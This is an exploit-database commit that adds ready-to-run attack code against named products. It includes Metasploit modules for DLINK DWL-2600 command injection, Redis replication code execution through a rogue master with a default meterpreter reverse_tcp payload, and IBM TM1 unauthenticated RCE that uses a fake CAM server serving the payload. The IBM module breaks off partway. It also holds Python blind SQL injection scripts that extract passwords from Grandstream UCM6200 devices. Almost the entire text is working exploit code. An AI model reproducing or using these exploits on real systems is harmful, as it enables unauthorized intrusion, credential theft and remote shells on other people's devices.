DB: 2020-04-01

7 changes to exploits/shellcodes

FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
Redis - Replication Code Execution (Metasploit)
IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)
DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)
SharePoint Workflows - XOML Injection (Metasploit)
Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
This commit is contained in:
Offensive Security 2020-04-01 05:01:47 +00:00
parent 169b528eaa
commit 19615ff704
8 changed files with 1497 additions and 0 deletions

138
exploits/hardware/remote/48274.rb Executable file
View file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
end
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end

View file

@ -0,0 +1,111 @@
# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5726
# Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1
--user lolwat
# [+] Reaching out to 192.168.2.1:8888
# [+] Password length 9
# [+] The password is LabPass1%
import sys
import time
import json
import struct
import socket
import argparse
def send_cti_with_length(sock, payload):
to_send = struct.pack('>I', len(payload))
to_send = to_send + payload
sock.sendall(to_send)
return recv_cti_with_length(sock)
def recv_cti_with_length(sock):
length = sock.recv(4)
length = struct.unpack('>I', length)[0]
response = sock.recv(length)
return response
top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8888)
top_parser.add_argument('--user', action="store", dest="user",
required=True, help="The user to brute force")
args = top_parser.parse_args()
print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport))
length = 0
while length < 100:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((args.rhost, args.rport))
challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" +
args.user.encode('utf-8') + b"' AND LENGTH(user_password)=" +
str(length).encode('utf-8') + b"--")
inject_result = json.loads(challenge_resp)
if (inject_result['status'] == 0):
break
else:
length = length + 1
sock.close()
if length == 100:
print('[-] Failed to discover the password length')
sys.exit(1)
print('[+] Password length', length)
password = ''
while len(password) < length:
value = 0x20
while value < 0x80:
if value == 0x22 or value == 0x5c:
temp_pass = password + '\\'
temp_pass = temp_pass + chr(value)
else:
temp_pass = password + chr(value)
temp_pass_len = len(temp_pass)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((args.rhost, args.rport))
challenge_resp = send_cti_with_length(sock,
b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND
user_password LIKE \'" + temp_pass.encode('utf-8') + b"%' AND
substr(user_password,1," + str(temp_pass_len).encode('utf-8') + b") = '" +
temp_pass.encode('utf-8') + b"'--")
inject_result = json.loads(challenge_resp)
sock.close()
if (inject_result['status'] == 0):
password = temp_pass
break
else:
value = value + 1
continue
if value == 0x80:
print('oh no.')
sys.exit(0)
print('[+] The password is', password)

View file

@ -0,0 +1,119 @@
# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5725
# Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based)
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat
# [+] Password length is 9
# [+] Discovering password...
# LabPass1%
# [+] Done! The password is LabPass1%
import sys
import ssl
import time
import asyncio
import argparse
import websockets
async def password_guess(ip, port, username):
# the path to exploit
uri = 'wss://' + ip + ':' + str(8089) + '/websockify'
# no ssl verification
ssl_context = ssl.SSLContext()
ssl_context.verify_mode = ssl.CERT_NONE
ssl_context.check_hostname = False
# determine the length of the password. The timeout is 10 seconds...
probably
# way too long but whatever.
length = 0
while length < 100:
async with websockets.connect(uri, ssl=ssl_context) as websocket:
start = time.time()
login =
'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'
+ username + '\' AND LENGTH(user_password)==' + str(length) + ' AND
88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or
\'1\'=\'2","token":"lolwat"}}'
await websocket.send(login)
response = await websocket.recv()
if (time.time() - start) < 5:
length = length + 1
continue
else:
break
# if we hit max password length than we've done something wrong
if (length == 100):
print('[+] Couldn\'t determine the passwords length.')
sys.exit(1)
print('[+] Password length is', length)
print('[+] Discovering password...')
# Now that we know the password length, just guess each password byte
until
# we've reached the full length. Again timeout set to 10 seconds.
password = ''
while len(password) < length:
value = 0x20
while value < 0x80:
if value == 0x22 or value == 0x5c:
temp_pass = password + '\\'
temp_pass = temp_pass + chr(value)
else:
temp_pass = password + chr(value)
temp_pass_len = len(temp_pass)
start = time.time()
async with websockets.connect(uri, ssl=ssl_context) as
websocket:
challenge =
'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'
+ username + '\' AND user_password LIKE \'' + temp_pass +'%\' AND
substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\'
AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or
\'1\'=\'2","token":"lolwat"}}'
await websocket.send(challenge)
response = await websocket.recv()
if (time.time() - start) < 5:
value = value + 1
continue
else:
print('\r' + temp_pass, end='')
password = temp_pass
break
if value == 0x80:
print('')
print('[-] Failed to determine the password.')
sys.exit(1)
print('')
print('[+] Done! The password is', password)
top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8089)
top_parser.add_argument('--user', action="store", dest="user",
required=True, help="The user to brute force")
args = top_parser.parse_args()
asyncio.get_event_loop().run_until_complete(password_guess(args.rhost,
args.rport, args.user))

297
exploits/linux/remote/48272.rb Executable file
View file

@ -0,0 +1,297 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Auxiliary::Redis
include Msf::Module::Deprecated
moved_from "exploit/linux/redis/redis_unauth_exec"
def initialize(info = {})
super(update_info(info,
'Name' => 'Redis Replication Code Execution',
'Description' => %q{
This module can be used to leverage the extension functionality added since Redis 4.0.0
to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
which called replication between master and slave.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'],
[ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic', {} ],
],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'SRVPORT' => '6379'
},
'Privileged' => false,
'DisclosureDate' => 'Nov 13 2018',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ SERVICE_RESOURCE_LOSS],
'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
},
))
register_options(
[
Opt::RPORT(6379),
OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
]
)
register_advanced_options(
[
OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']),
OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.'])
]
)
deregister_options('URIPATH', 'THREADS', 'SSLCert')
end
#
# Now tested on redis 4.x and 5.x
#
def check
connect
# they are only vulnerable if we can run the CONFIG command, so try that
return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
report_redis(redis_version)
end
unless redis_version
print_error('Cannot retrieve redis version, please check it manually')
return Exploit::CheckCode::Unknown
end
# Only vulnerable to version 4.x or 5.x
version = Gem::Version.new(redis_version)
if version >= Gem::Version.new('4.0.0')
vprint_status("Redis version is #{redis_version}")
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
ensure
disconnect
end
def has_check?
true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis
end
def exploit
if check_custom
@module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8)
@module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
else
@module_init_name = 'shell'
@module_cmd = 'shell.exec'
end
if srvhost == '0.0.0.0'
fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
end
#
# Prepare for payload.
#
# 1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable.
# It's only worked on linux system.
#
# 2. Use compiled payload, it's avaiable on all OS, however more detectable.
#
if check_custom
buf = create_payload
generate_code_file(buf)
compile_payload
end
connect
#
# Send the payload.
#
redis_command('SLAVEOF', srvhost, srvport.to_s)
redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}")
::IO.select(nil, nil, nil, 2.0)
# start the rogue server
start_rogue_server
# waiting for victim to receive the payload.
Rex.sleep(1)
redis_command('MODULE', 'LOAD', "./#{module_file}")
redis_command('SLAVEOF', 'NO', 'ONE')
# Trigger it.
print_status('Sending command to trigger payload.')
pull_the_trigger
# Clean up
Rex.sleep(2)
register_file_for_cleanup("./#{module_file}")
#redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
#redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
ensure
disconnect
end
#
# We pretend to be a real redis server, and then slave the victim.
#
def start_rogue_server
begin
socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
print_status("Listening on #{srvhost}:#{srvport}")
rescue Rex::BindFailed
print_warning("Handler failed to bind to #{srvhost}:#{srvport}")
print_status("Listening on 0.0.0.0:#{srvport}")
socket = Rex::Socket::TcpServer.create({'LocalHost'=>'0.0.0.0', 'LocalPort'=>srvport})
end
rsock = socket.accept()
vprint_status('Accepted a connection')
# Start negotiation
while true
request = rsock.read(1024)
vprint_status("in<<< #{request.inspect}")
response = ""
finish = false
case
when request.include?('PING')
response = "+PONG\r\n"
when request.include?('REPLCONF')
response = "+OK\r\n"
when request.include?('PSYNC') || request.include?('SYNC')
response = "+FULLRESYNC #{'Z'*40} 1\r\n"
response << "$#{payload_bin.length}\r\n"
response << "#{payload_bin}\r\n"
finish = true
end
if response.length < 200
vprint_status("out>>> #{response.inspect}")
else
vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}")
end
rsock.put(response)
if finish
print_status('Rogue server close...')
rsock.close()
socket.close()
break
end
end
end
def pull_the_trigger
if check_custom
redis_command("#{@module_cmd}")
else
execute_cmdstager
end
end
#
# Parpare command stager for the pre-compiled payload.
# And the command of module is hard-coded.
#
def execute_command(cmd, opts = {})
redis_command('shell.exec',"#{cmd.to_s}") rescue nil
end
#
# Generate source code file of payload to be compiled dynamicly.
#
def generate_code_file(buf)
template = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))}
end
def compile_payload
make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile')
vprint_status("Clean old files")
vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|)
vprint_status(%x|make -C #{File.dirname(make_file)} clean|)
print_status('Compile redis module extension file')
res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true|
if res.include? 'true'
print_good("Payload generated successfully! ")
else
print_error(res)
fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
end
end
#
# check the environment for compile payload to so file.
#
def check_env
# check if linux
return false unless %x|uname -s 2>/dev/null|.include? "Linux"
# check if gcc installed
return false unless %x|command -v gcc && echo true|.include? "true"
# check if ld installed
return false unless %x|command -v ld && echo true|.include? "true"
true
end
def check_custom
return @custom_payload if @custom_payload
@custom_payload = false
@custom_payload = true if check_env && datastore['CUSTOM']
@custom_payload
end
def module_file
return @module_file if @module_file
@module_file = datastore['RedisModuleName'] || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
end
def create_payload
p = payload.encoded
Msf::Simple::Buffer.transform(p, 'c', 'buf')
end
def payload_bin
return @payload_bin if @payload_bin
if check_custom
@payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so'))
else
@payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp', 'exp.so'))
end
@payload_bin
end
end

654
exploits/multiple/remote/48273.rb Executable file
View file

@ -0,0 +1,654 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "IBM TM1 / Planning Analytics Unauthenticated Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability in IBM TM1 / Planning Analytics that allows
an unauthenticated attacker to perform a configuration overwrite.
It starts by querying the Admin server for the available applications, picks one,
and then exploits it. You can also provide an application name to bypass this step,
and exploit the application directly.
The configuration overwrite is used to change an application server authentication
method to "CAM", a proprietary IBM auth method, which is simulated by the exploit.
The exploit then performs a fake authentication as admin, and finally abuses TM1
scripting to perform a command injection as root or SYSTEM.
Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux.
Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions
earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>',
# Vulnerability discovery and Metasploit module
'Gareth Batchelor <gbatchelor@cloudtrace.com.au>'
# Real world exploit testing and feedback
],
'References' =>
[
[ 'CVE', '2019-4716' ],
[ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ]
],
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}
],
[ 'Windows (Command)',
{
'Platform' => 'win',
'Arch' => [ARCH_CMD],
'Payload' =>
{
# Plenty of bad chars in Windows... there might be more lurking
'BadChars' => "\x25\x26\x27\x3c\x3e\x7c",
}
}
],
[ 'Linux',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64]
}
],
[ 'Linux (Command)',
{
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'Payload' =>
{
# only one bad char in Linux, baby! (that we know of...)
'BadChars' => "\x27",
}
}
],
[ 'AIX (Command)',
{
# This should work on AIX, but it was not tested!
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'Payload' =>
{
# untested, but assumed to be similar to Linux
'BadChars' => "\x27",
}
}
],
],
'Stance' => Msf::Exploit::Stance::Aggressive,
# we need this to run in the foreground
'DefaultOptions' =>
{
# give the target lots of time to download the payload
'WfsDelay' => 30,
},
'Privileged' => true,
'DisclosureDate' => "Dec 19 2019",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5498),
OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
])
register_advanced_options [
OptString.new('APP_NAME', [false, 'Name of the target application']),
OptInt.new('AUTH_ATTEMPTS', [true, "Number of attempts to auth to CAM server", 10]),
]
end
## Packet structure start
# these are client message types
MSG_TYPES = {
:auth => [ 0x0, 0x1 ],
:auth_uniq => [ 0x0, 0x3 ],
:auth_1001 => [ 0x0, 0x4 ],
:auth_cam_pass => [ 0x0, 0x8 ],
:auth_dist => [ 0x0, 0xa ],
:obj_register => [ 0, 0x21 ],
:obj_prop_set => [ 0, 0x25 ],
:proc_create => [ 0x0, 0x9c ],
:proc_exec => [ 0x0, 0xc4 ],
:get_config => [ 0x1, 0x35 ],
:upd_clt_pass => [ 0x1, 0xe2 ],
:upd_central => [ 0x1, 0xae ],
}
# packet header is universal for both client and server
PKT_HDR = [ 0, 0, 0xff, 0xff ]
# pkt end marker (client only, server responses do not have it)
PKT_END = [ 0xff, 0xff ]
# empty auth object, used for operations that do not require auth
AUTH_OBJ_EMPTY = [ 5, 3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ]
# This is actually the client version number
# 0x6949200 = 110400000 in decimal, or version 11.4
# The lowest that version 11.4 seems to accept is 8.4, so leave that as the default
# 8.4 = 0x4CACE80
# 9.1 = 0x55ED120
# 9.4 = 0x5636500
# 10.1 = 0x5F767A0
# 10.4 = 0x5FBFB80
# 11.1 = 0x68FFE20
# 11.4 = 0x6949200
#
# If something doesn't work, try using one of the values above, but bear in mind this module
# was tested on 10.2.2 and 11.4,
VERSION = [ 0x03, 0x04, 0xca, 0xce, 0x80 ]
## Packet structure end
## Network primitives start
# unpack a string (hex string to array of bytes)
def str_unpack(str)
arr = []
str.scan(/../).each do |b|
arr += [b].pack('H*').unpack('C*')
end
arr
end
# write strings directly to socket; each 2 string chars are a byte
def sock_rw_str(sock, msg_str)
sock_rw(sock, str_unpack(msg_str))
end
# write array to socket and get result
# wait should also be implemented in msf
def sock_rw(sock, msg, ignore = false, wait = 0)
sock.write(msg.pack('C*'))
if not ignore
sleep(wait)
recv_sz = sock.read(2).unpack('H*')[0].to_i(16)
bytes = sock.read(recv_sz-2).unpack('H*')[0]
bytes
end
end
def sock_r(sock)
recv_sz = sock.read(2).unpack('H*')[0].to_i(16)
bytes = sock.read(recv_sz-2).unpack('H*')[0]
bytes
end
def get_socket(app_host, app_port, ssl = 0)
begin
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp(
{ 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 }
)
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
sock.close if sock
end
if sock.nil?
fail_with(Failure::Unknown, 'Failed to connect to the chosen application')
end
if ssl == 1
# also need to add support for old ciphers
ctx = OpenSSL::SSL::SSLContext.new
ctx.min_version = OpenSSL::SSL::SSL3_VERSION
ctx.security_level = 0
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
s = OpenSSL::SSL::SSLSocket.new(sock, ctx)
s.sync_close = true
s.connect
return s
end
return sock
end
## Network primitives end
## Packet primitives start
def pack_sz(sz)
[sz].pack('n*').unpack('C*')
end
# build a packet, ready to send
def pkt_build(msg_type, auth_obj, contents)
pkt = PKT_HDR + msg_type + auth_obj + contents + PKT_END
pack_sz(pkt.length + 2) + pkt
end
# extracts the first object from a server response
def obj_extract(res)
arr = str_unpack(res)
# ignore packet header (4 bytes)
arr.shift(PKT_HDR.length)
if arr[0] == 5
# this is an object, get the type (1 byte) plus the object bytes (9 bytes)
obj = Array.new
obj = arr[0..9]
obj
end
end
# adds a string to a packet
# C string = 0x2; utf string = 0xe; binary = 0xf
def stradd(str, type = 0xe)
arr = [ type ] # string type
arr += pack_sz(str.length)
arr += str.unpack('C*')
arr
end
# packs binary data into an array
def datapack(data)
arr = []
data.chars.each do |d|
arr << d.ord
end
arr
end
def binadd(data)
arr = [ 0xf ] # binary type 0xf
arr += pack_sz(data.length) # 2 byte size
arr += datapack(data) # ... and add the data
end
def get_str(data)
s = ""
while data[0] != '"'.ord
data.shift
end
data.shift
while data[0] != '"'.ord
s += data[0].chr
data.shift
end
# comma
data.shift
s
end
# This fetches the current IntegratedSecurityMode from a packet such as
# 0000ffff070000000203000000 01 07000000020e00000e0000 (1)
# 0000ffff070000000203000000 02 07000000020e00000e00084b65726265726f73 (2)
# 0000ffff070000000203000000 06 07000000010e0000 (6)
def get_auth(data)
# make it into an array
data = str_unpack(data)
if data.length > 13
# skip 13 bytes (header + array indicator + index indicator)
data.shift(13)
# fetch the auth method byte
data[0]
end
end
def update_auth(auth_method, restore = false)
# first byte of data is ignored, so add an extra space
if restore
srv_config = " IntegratedSecurityMode=#{auth_method}"
else
# To enable CAM server authentication over SSL, the CAM server certificate has to be previously
# imported into the server. Since we can't do this, disable SSL in the fake CAM.
srv_config = " IntegratedSecurityMode=#{auth_method}\n" +
"ServerCAMURI=http://#{srvhost}:#{srvport}\n" +
"ServerCAMURIRetryAttempts=10\nServerCAMIPVersion=ipv4\n" +
"CAMUseSSL=F\n"
end
arr =
[ 3 ] + [ 0, 0, 0, 2 ] + # no idea what this index is
[ 3 ] + [ 0, 0, 0, 2 ] + # same here
[ 3 ] + [ 0 ] * 4 + # same here
stradd(rand_text_alpha(5..12)) + # same here...
stradd("tm1s_delta.cfg") + # update file name
binadd(srv_config) + # file data
stradd(rand_text_alpha(0xf)) # last sync timestamp, max len 0xf
upd_auth = pkt_build(
MSG_TYPES[:upd_central],
AUTH_OBJ_EMPTY,
[ 7 ] + # array type
[ 0, 0, 0, 7 ] + # array len (fixed size of 7 for this pkt)
arr
)
upd_auth
end
## Packet primitives end
## CAM HTTP functions start
def on_request_uri(cli, request)
xml_res = %{<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="http://developer.cognos.com/schemas/dataSourceCommandBlock/1/" xmlns:bus="http://developer.cognos.com/schemas/bibus/3/" xmlns:cm="http://developer.cognos.com/schemas/contentManagerService/1" xmlns:ns10="http://developer.cognos.com/schemas/indexUpdateService/1" xmlns:ns11="http://developer.cognos.com/schemas/jobService/1" xmlns:ns12="http://developer.cognos.com/schemas/metadataService/1" xmlns:ns13="http://developer.cognos.com/schemas/mobileService/1" xmlns:ns14="http://developer.cognos.com/schemas/monitorService/1" xmlns:ns15="http://developer.cognos.com/schemas/planningAdministrationConsoleService/1" xmlns:ns16="http://developer.cognos.com/schemas/planningRuntimeService/1" xmlns:ns17="http://developer.cognos.com/schemas/planningTaskService/1" xmlns:ns18="http://developer.cognos.com/schemas/reportService/1" xmlns:ns19="http://developer.cognos.com/schemas/systemService/1" xmlns:ns2="http://developer.cognos.com/schemas/agentService/1" xmlns:ns3="http://developer.cognos.com/schemas/batchReportService/1" xmlns:ns4="http://developer.cognos.com/schemas/dataIntegrationService/1" xmlns:ns5="http://developer.cognos.com/schemas/dataMovementService/1" xmlns:ns6="http://developer.cognos.com/schemas/deliveryService/1" xmlns:ns7="http://developer.cognos.com/schemas/dispatcher/1" xmlns:ns8="http://developer.cognos.com/schemas/eventManagementService/1" xmlns:ns9="http://developer.cognos.com/schemas/indexSearchService/1">
<SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<cm:queryResponse>
<result baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]">
PLACEHOLDER
</result>
</cm:queryResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>}
session =
%Q{ <item xsi:type="bus:session">
<identity>
<value baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]">
<item xsi:type="bus:account">
<searchPath><value>admin</value></searchPath>
</item>
</value>
</identity>
</item>}
account =
%Q{ <item xsi:type="bus:account">
<defaultName><value>admin</value></defaultName>
</item>}
headers = { "SOAPAction" => '"http://developer.cognos.com/schemas/contentManagerService/1"'}
if request.body.include? "<searchPath>/</searchPath>"
print_good("CAM: Received first CAM query, responding with account info")
response = xml_res.sub('PLACEHOLDER', account)
elsif request.body.include? "<searchPath>~~</searchPath>"
print_good("CAM: Received second CAM query, responding with session info")
response = xml_res.sub('PLACEHOLDER', session)
elsif request.body.include? "<searchPath>admin</searchPath>"
print_good("CAM: Received third CAM query, responding with random garbage")
response = rand_text_alpha(5..12)
elsif request.method == "GET"
print_good("CAM: Received request for payload executable, shell incoming!")
response = @pl
headers = { "Content-Type" => "application/octet-stream" }
else
response = ''
print_error("CAM: received unknown request")
end
send_response(cli, response, headers)
end
## CAM HTTP functions end
def restore_auth(app, auth_current)
print_status("Restoring original authentication method #{auth_current}")
upd_cent = update_auth(auth_current, true)
s = get_socket(app[2], app[3], app[5])
sock_rw(s, upd_cent, true)
s.close
end
def exploit
# first let's check if SRVHOST is valid
if datastore['SRVHOST'] == "0.0.0.0"
fail_with(Failure::Unknown, "Please enter a valid IP address for SRVHOST")
end
# The first step is to query the administrative server to see what apps are available.
# This action can be done unauthenticated. We then list all the available app servers
# and pick a random one that is currently accepting clients. This step is important
# not only to know what app servers are available, but also to know if we need to use
# SSL or not.
# The admin server is usually at 5498 using SSL. Non-SSL access is disabled by default, but when enabled, it's available at port 5495
#
# Step 1: fetch the available applications / servers from the Admin server
